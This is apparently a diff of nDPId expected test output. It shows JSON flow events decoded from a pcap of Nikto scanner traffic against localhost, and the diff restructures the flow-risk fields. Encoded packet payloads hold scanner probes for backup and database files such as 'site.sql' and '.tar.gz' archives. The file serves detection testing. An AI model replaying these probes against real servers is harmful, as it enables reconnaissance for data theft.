 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
